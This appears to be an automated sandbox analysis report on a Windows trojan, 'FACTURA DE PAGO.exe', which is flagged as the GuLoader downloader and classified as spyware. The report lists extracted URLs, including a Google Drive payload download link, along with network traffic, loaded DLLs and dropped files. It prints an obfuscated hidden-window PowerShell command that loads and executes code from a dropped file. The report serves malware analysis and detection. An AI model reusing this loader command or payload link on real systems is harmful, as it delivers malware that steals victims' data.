Source: powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: msiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: msiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/K
Source: msiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931153169.0000000020570000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2
Source: msiexec.exe, 00000004.00000002.2920754309.000000000539A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2Y
Source: msiexec.exe, 00000004.00000002.2920754309.000000000540A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2034849572.000000000540A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: msiexec.exe, 00000004.00000002.2920754309.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1ZEribp6UWsv7328G3wN4qTd_6APeaRh2&export=download
Source: msiexec.exe, 00000004.00000002.2920754309.000000000540A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2034849572.000000000540A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/j$v
Source: powershell.exe, 00000001.00000002.1896848086.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.1899557466.0000000005ABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F50000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: msiexec.exe, 00000004.00000002.2931722428.0000000020F50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186
Source: msiexec.exe, 00000004.00000002.2931722428.0000000020FBF000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020F7A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.0000000020FE7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/155.94.241.186$
Source: msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: msiexec.exe, 00000004.00000002.2932772711.0000000022182000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022053000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000221D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000222A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FDE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: msiexec.exe, 00000004.00000002.2932772711.0000000021FE4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022280000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FB9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022188000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002215D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: msiexec.exe, 00000004.00000002.2932772711.0000000022182000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022053000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000221D0000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.00000000222A5000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FDE000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: msiexec.exe, 00000004.00000002.2932772711.0000000021FE4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022280000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000021FB9000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.0000000022188000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002202E000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.2932772711.000000002215D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: msiexec.exe, 00000004.00000003.1984367070.000000000540F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: msiexec.exe, 00000004.00000002.2931722428.00000000210F4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: msiexec.exe, 00000004.00000002.2931722428.00000000210EF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443

Source: unknown	HTTPS traffic detected: 216.58.206.46:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.186.33:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe

Code function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405086

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Kinna\FACTURA DE PAGO.exe

Jump to dropped file

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe

Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040310F

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Code function: 0_2_004048C5	0_2_004048C5
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Code function: 0_2_004064CB	0_2_004064CB
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Code function: 0_2_00406CA2	0_2_00406CA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00BCE260	1_2_00BCE260
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EEC146	4_2_20EEC146
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EED278	4_2_20EED278
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EE5362	4_2_20EE5362
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EEC468	4_2_20EEC468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EEC738	4_2_20EEC738
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EEE988	4_2_20EEE988
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EECA08	4_2_20EECA08
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EECCD8	4_2_20EECCD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EECFAB	4_2_20EECFAB
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EE7118	4_2_20EE7118
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EE29E0	4_2_20EE29E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EEE97B	4_2_20EEE97B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EEF974	4_2_20EEF974
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EE9DE0	4_2_20EE9DE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_20EE3E09	4_2_20EE3E09

Source: FACTURA DE PAGO.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/14@5/5

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe

0_2_0040310F

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe

Code function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_00404352

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe

Code function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,

0_2_0040205E

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe

File created: C:\Users\user\AppData\Roaming\underarmsmusklens

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe

File created: C:\Users\user\AppData\Local\Temp\nsyF0B8.tmp

Jump to behavior

Source: FACTURA DE PAGO.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FACTURA DE PAGO.exe

Virustotal: Detection: 20%

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe

File read: C:\Users\user\Desktop\FACTURA DE PAGO.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FACTURA DE PAGO.exe "C:\Users\user\Desktop\FACTURA DE PAGO.exe"
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: secur32.dll	Jump to behavior

Source: C:\Users\user\Desktop\FACTURA DE PAGO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: FACTURA DE PAGO.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.1913479632.0000000008213000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bqm.Core.pdbP source: powershell.exe, 00000001.00000002.1906039371.0000000006F03000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mation.pdb source: powershell.exe, 00000001.00000002.1895923061.00000000008BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.1895923061.00000000008BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.1895923061.00000000008BF000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000001.00000002.1914582277.0000000008D6C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

